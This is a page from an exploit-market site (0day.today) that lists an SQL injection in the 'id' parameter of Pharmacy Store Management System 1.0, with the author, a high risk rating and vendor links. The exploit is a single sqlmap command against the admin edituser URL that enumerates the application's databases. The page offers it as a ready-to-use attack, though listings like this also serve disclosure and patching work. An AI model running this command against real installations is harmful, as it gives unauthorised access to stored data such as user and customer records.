[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pharmacy Store Management System 1.0 - (id) SQL Injection Vulnerability

Author
Aydın Baran Ertemir
Risk
[
Security Risk High
]
0day-ID
0day-ID-35366
Category
web applications
Date add
02-12-2020
Platform
php
# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

#  0day.today [2024-10-06]  #